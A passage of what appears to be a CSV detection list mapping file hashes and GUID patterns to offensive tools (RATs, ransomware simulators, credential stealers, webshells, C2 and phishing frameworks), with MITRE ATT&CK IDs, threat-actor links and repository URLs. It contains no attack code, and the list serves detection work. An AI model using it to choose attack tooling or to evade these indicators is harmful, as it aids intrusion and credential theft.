features such as HVNC - live microphone - reverse proxy and much much more","T1133 - T1021.001 - T1563.002 - T1113 - T1123 - T1571 - T1090","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011","N/A","N/A","C2","https://github.com/moom825/xeno-rat","1","0","#GUIDproject","N/A","10","10","1225","323","2024-03-05T06:22:36Z","2023-10-17T06:41:56Z","27972" "*644cdb7a7f0d50a84f6b7ad2e213636d52862b9491425e8be2fb7b4d91ac1131*",".{0,1000}644cdb7a7f0d50a84f6b7ad2e213636d52862b9491425e8be2fb7b4d91ac1131.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27973" 
"*644e2fa03a4d45b8d0417819a7548339069df8d405131039006968b312c8c6f4*",".{0,1000}644e2fa03a4d45b8d0417819a7548339069df8d405131039006968b312c8c6f4.{0,1000}","offensive_tool_keyword","PSRansom","PSRansom is a PowerShell Ransomware Simulator with C2 Server capabilities. This tool helps you simulate encryption process of a generic ransomware in any system on any system with PowerShell installed on it. Thanks to the integrated C2 server. you can exfiltrate files and receive client information via HTTP.","T1486 - T1107 - T1566.001","TA0011 - TA0010","N/A","N/A","Ransomware","https://github.com/JoelGMSec/PSRansom","1","0","#filehash","N/A","9","5","478","116","2024-01-19T09:50:26Z","2022-02-27T11:52:03Z","27974" "*645524305b8203fddf667329025f7ce531c9bc664f3186d5db5cfa0ff55d53b5*",".{0,1000}645524305b8203fddf667329025f7ce531c9bc664f3186d5db5cfa0ff55d53b5.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","27975" "*6455615d468553dbe82bcea9bb1e67082c4d728939abb16b05e8e378ed4af09b*",".{0,1000}6455615d468553dbe82bcea9bb1e67082c4d728939abb16b05e8e378ed4af09b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27976" 
"*6455d210924926d364ebf88ff053821ff2d603ea99b17d1dbb454a7d061992cc*",".{0,1000}6455d210924926d364ebf88ff053821ff2d603ea99b17d1dbb454a7d061992cc.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#filehash","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27977" "*64591a6674fa71f5bf6858e009d487a56dc13d306cdab14a76e7b6fe49d4338b*",".{0,1000}64591a6674fa71f5bf6858e009d487a56dc13d306cdab14a76e7b6fe49d4338b.{0,1000}","offensive_tool_keyword","phishery","Phishery is a Simple SSL Enabled HTTP server with the primary purpose of phishing credentials via Basic Authentication. Phishery also provides the ability easily to inject the URL into a .docx Word document.","T1566.001 - T1071 - T1204.002","TA0001 ","N/A","BERSERK BEAR","Phishing","https://github.com/ryhanson/phishery","1","0","#filehash","N/A","9","10","993","209","2017-09-11T15:42:10Z","2016-09-25T02:19:24Z","27978" "*6461a823b6693d08cf0fe8be939138b7cf2ee31cba7f162e1f2f7b62d7446a7e*",".{0,1000}6461a823b6693d08cf0fe8be939138b7cf2ee31cba7f162e1f2f7b62d7446a7e.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","27980" "*646698ef7a2a2cf03c2068c8e1c8b2f8fc18128b6027100c45acfe18b5c6d177*",".{0,1000}646698ef7a2a2cf03c2068c8e1c8b2f8fc18128b6027100c45acfe18b5c6d177.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the 
browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27981" "*647a81d98da7fd542e27a095a125cb51273ad7340829362e76fa59426d9a8a23*",".{0,1000}647a81d98da7fd542e27a095a125cb51273ad7340829362e76fa59426d9a8a23.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","27983" "*647c7e069b40a7fcade145d8fe942345e1c18dc54218a85b425ab7f33a868499*",".{0,1000}647c7e069b40a7fcade145d8fe942345e1c18dc54218a85b425ab7f33a868499.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. 
This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","27985" "*6481fa0be3fd79b6aab74328a3d475b5decec17ff03d0293c2212cbfe53c5dfa*",".{0,1000}6481fa0be3fd79b6aab74328a3d475b5decec17ff03d0293c2212cbfe53c5dfa.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27986" "*64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de*",".{0,1000}64853db4da2d13a82c795e1eb6e7e2c4efc2d673be34b5f65398f54b7277a5de.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","27987" "*648BA42AFD2FEC89A055E69B21A04CB11B74F13916249F4BC3512C3145FDC249*",".{0,1000}648BA42AFD2FEC89A055E69B21A04CB11B74F13916249F4BC3512C3145FDC249.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","#filehash","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","27989" 
"*64976360321e4f2e591527df2114cee80b6c210be230b38c9b4abf6506804040*",".{0,1000}64976360321e4f2e591527df2114cee80b6c210be230b38c9b4abf6506804040.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27992" "*649be8fb570c82231730dbdba7934429187a5d8deaf0a17150aa304786378434*",".{0,1000}649be8fb570c82231730dbdba7934429187a5d8deaf0a17150aa304786378434.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27994" "*64a0a19cce004d6f35a0995ac42f960e7a4b78f56b03a2937e8e9459312a31b2*",".{0,1000}64a0a19cce004d6f35a0995ac42f960e7a4b78f56b03a2937e8e9459312a31b2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27995" "*64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671*",".{0,1000}64a7c5e1ef0e19140bf06ba70e0255f53c67c117ce1b072f46c30a1be44ff671.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","27996" "*64a8d27e296bcb483eea9e6b7145236d919b1dc3d4bdd80259e175e439f0d92c*",".{0,1000}64a8d27e296bcb483eea9e6b7145236d919b1dc3d4bdd80259e175e439f0d92c.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","27997" "*64ac445fc926e54e4083cc474a92414c76ef1e22cc002bf52efd3db5594cb76d*",".{0,1000}64ac445fc926e54e4083cc474a92414c76ef1e22cc002bf52efd3db5594cb76d.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27998" "*64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935*",".{0,1000}64b40a70b232b7e23a187a11c52ef8d8b7f3e16a5b869af16b390cbbe4aab935.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27999" "*64c61eefcf2d457486e071a3c869c39d4a9583820ab007c8347ea9f34b0da570*",".{0,1000}64c61eefcf2d457486e071a3c869c39d4a9583820ab007c8347ea9f34b0da570.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - 
T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28001" "*64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced*",".{0,1000}64c86a12800b8d5064e7313a43eb6f5504a7043ab15c227cecfddaf84cc74ced.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","28002" "*64cd8640e2b53358f8fbafbcbded6db53e1acd49fe4ccc8196c8ed17c551bc70*",".{0,1000}64cd8640e2b53358f8fbafbcbded6db53e1acd49fe4ccc8196c8ed17c551bc70.{0,1000}","offensive_tool_keyword","rsg","reverse shell powershell","T1059.001 - T1203 - T1105 - T1562.001","TA0002 - TA0011","N/A","Black Basta","C2","https://github.com/mthbernardes/rsg","1","0","#filehash","N/A","10","10","561","126","2024-05-03T16:33:20Z","2017-12-12T02:57:07Z","28003" "*64ce94651ee719279668c5d3bcfb376da9993aba306dc8b7f1e4def4c6917312*",".{0,1000}64ce94651ee719279668c5d3bcfb376da9993aba306dc8b7f1e4def4c6917312.{0,1000}","offensive_tool_keyword","php-reverse-shell","PHP shells that work on Linux OS - macOS and Windows OS","T1505.003 - T1059.003 - T1100","TA0003 - TA0005 - TA0011","N/A","Black Basta","C2","https://github.com/ivan-sincek/php-reverse-shell","1","0","#filehash","N/A","10","10","482","152","2023-10-03T09:48:21Z","2020-07-14T07:22:54Z","28004" "*64d0026295c3c887bbcb256967aae006f4df254a2bc9418f9a1dc30fd6115ee1*",".{0,1000}64d0026295c3c887bbcb256967aae006f4df254a2bc9418f9a1dc30fd6115ee1.{0,1000}","offensive_tool_keyword","SharpGraphView","Microsoft Graph API post-exploitation toolkit","T1078.004 - 
T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/SharpGraphView","1","0","#filehash","N/A","6","1","94","9","2024-07-13T12:27:38Z","2024-05-04T11:23:42Z","28005" "*64d2173109cdc67df6e9e15a275b4ed0b5488397c290b996ffd3ed445f361b79*",".{0,1000}64d2173109cdc67df6e9e15a275b4ed0b5488397c290b996ffd3ed445f361b79.{0,1000}","offensive_tool_keyword","ChromeStealer","extract and decrypt stored passwords from Google Chrome","T1555.003 - T1003.001 - T1552.001","TA0006 ","N/A","N/A","Credential Access","https://github.com/BernKing/ChromeStealer","1","0","#filehash","N/A","8","2","145","18","2024-07-25T08:27:10Z","2024-07-14T13:27:30Z","28007" "*64D26B66-8A59-0724-007F-9001C4F472A2*",".{0,1000}64D26B66\-8A59\-0724\-007F\-9001C4F472A2.{0,1000}","offensive_tool_keyword","gh0st","Malware RAT with keylogger - dll injection - C2 - Remote control","T1204.002 - T1071.001 - T1027 - T1036.005 - T1055.001 - T1005 - T1056.001 - T1074.001 - T1105 - T1562.001 - T1543.003 - T1547.001 - T1571 - T1573.001 - T1106 - T1219","TA0002 - TA0003 - TA0004 - TA0008 - TA0009 - TA0010 - TA0011","GhostRAT","N/A","Malware","https://github.com/sin5678/gh0st","1","0","#GUIDProject","N/A","10","6","508","274","2013-05-08T21:17:26Z","2012-10-05T06:25:36Z","28008" "*64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99*",".{0,1000}64d2905609b4275f692466d0aacdd3f9c7da7860e9ed6dd7047e6dbcec851d99.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","#filehash","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","28009" "*64D84D51-F462-4A24-85EA-845C97238C09*",".{0,1000}64D84D51\-F462\-4A24\-85EA\-845C97238C09.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh 
DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","#GUIDproject","N/A","10","1","31","79","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z","28011" "*64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310*",".{0,1000}64e4cb3e5effc17d4b5cf14a8c8a095e9edd0b089ecd6106449bd7e95a961310.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28012" "*64e8b1efc560e837ac87e1fe231b92781d5eb9dfc3688d10fd38ed32f5556640*",".{0,1000}64e8b1efc560e837ac87e1fe231b92781d5eb9dfc3688d10fd38ed32f5556640.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28013" "*64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24*",".{0,1000}64f05121f9c950fd6146c9d91aded76884e80fc69825d80b688b113eb8271a24.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","28014" "*64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8*",".{0,1000}64f0fda500b2a622279f62bcc86e5282b9e6c5ee8e5ef55380e3a08e55b5ecc8.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","28015" "*64f235e5a231dcf5f1fd79b2887c9c2f3be577ca71b424a59c987d778d580d11*",".{0,1000}64f235e5a231dcf5f1fd79b2887c9c2f3be577ca71b424a59c987d778d580d11.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28016" "*64f2cdd3e097e191e0395ae0ac0f0f443387ab3a881a2f6baddfc53cd7bfb93f*",".{0,1000}64f2cdd3e097e191e0395ae0ac0f0f443387ab3a881a2f6baddfc53cd7bfb93f.{0,1000}","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0005 - TA0004","N/A","Evilnum","Defense 
Evasion","https://github.com/hfiref0x/UACME","1","0","#filehash","N/A","10","10","6711","1348","2025-03-09T03:33:26Z","2015-03-28T12:04:33Z","28017" "*64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27*",".{0,1000}64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","0","#filehash","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","28018" "*64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27*",".{0,1000}64fc0afc72a37b1071482e9c4725cd35fa2b974c6903cd01124ed7fe9d2c8e27.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28019" "*64fd910fe28fc9c7c8c1ee35cbf5af6b23141bdddeb22ed5d3ecf3902917680b*",".{0,1000}64fd910fe28fc9c7c8c1ee35cbf5af6b23141bdddeb22ed5d3ecf3902917680b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","28020" 
"*64fe21c5033e01c0f5c45a9d0f990d6d4b5ae2f20416b65787385844332411*",".{0,1000}64fe21c5033e01c0f5c45a9d0f990d6d4b5ae2f20416b65787385844332411.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","28021" "*6500d2030465216b60c086fbbbb4b52ec043473c802edf71d9b8277ee4b52efe*",".{0,1000}6500d2030465216b60c086fbbbb4b52ec043473c802edf71d9b8277ee4b52efe.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","28022" "*651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e*",".{0,1000}651095e7885df539f9cf20ded168c9097051bc99bcaa5cb5442d21267e14317e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","28023" "*6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d*",".{0,1000}6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 
- T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#filehash","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","28026" "*6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d*",".{0,1000}6511e5a343746d582d9e5f598ac329eb56ccde68429c880b1a9e551f5c27083d.{0,1000}","offensive_tool_keyword","SharpSploitConsole","Console Application designed to interact with SharpSploit","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/anthemtotheego/SharpSploitConsole","1","0","#filehash","N/A","10","2","182","36","2022-02-21T15:12:26Z","2018-10-02T18:57:46Z","28027" "*65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5*",".{0,1000}65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://www.microsoft.com/en-us/security/blog/2021/03/02/hafnium-targeting-exchange-servers/","1","0","#filehash","webshell used with proxylogon exploitation","10","10","N/A","N/A","N/A","N/A","28028" "*651834f5cb6e7559c8be9de345396ad4c034d08fa92169f374404989a0590c5f*",".{0,1000}651834f5cb6e7559c8be9de345396ad4c034d08fa92169f374404989a0590c5f.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","28030" 
"*651e286fdf6d57e43df7aeb51d819999ecc28621bdefb834a5ef57d41dcf7336*",".{0,1000}651e286fdf6d57e43df7aeb51d819999ecc28621bdefb834a5ef57d41dcf7336.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","28032" "*651e8488f87c2dd4524da1169f3abca80e165a6cc22f1355163a0c0e713fb0f6*",".{0,1000}651e8488f87c2dd4524da1169f3abca80e165a6cc22f1355163a0c0e713fb0f6.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","28033" "*65212e7e24bf5e11c584e0e222f02cd3695d1266a8ce024f91b890359eefdd14*",".{0,1000}65212e7e24bf5e11c584e0e222f02cd3695d1266a8ce024f91b890359eefdd14.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","28034" "*6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115*",".{0,1000}6522659bfa7046803bb28a749799fb9b876d656fa46037fe28709fb4ad15d115.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - 
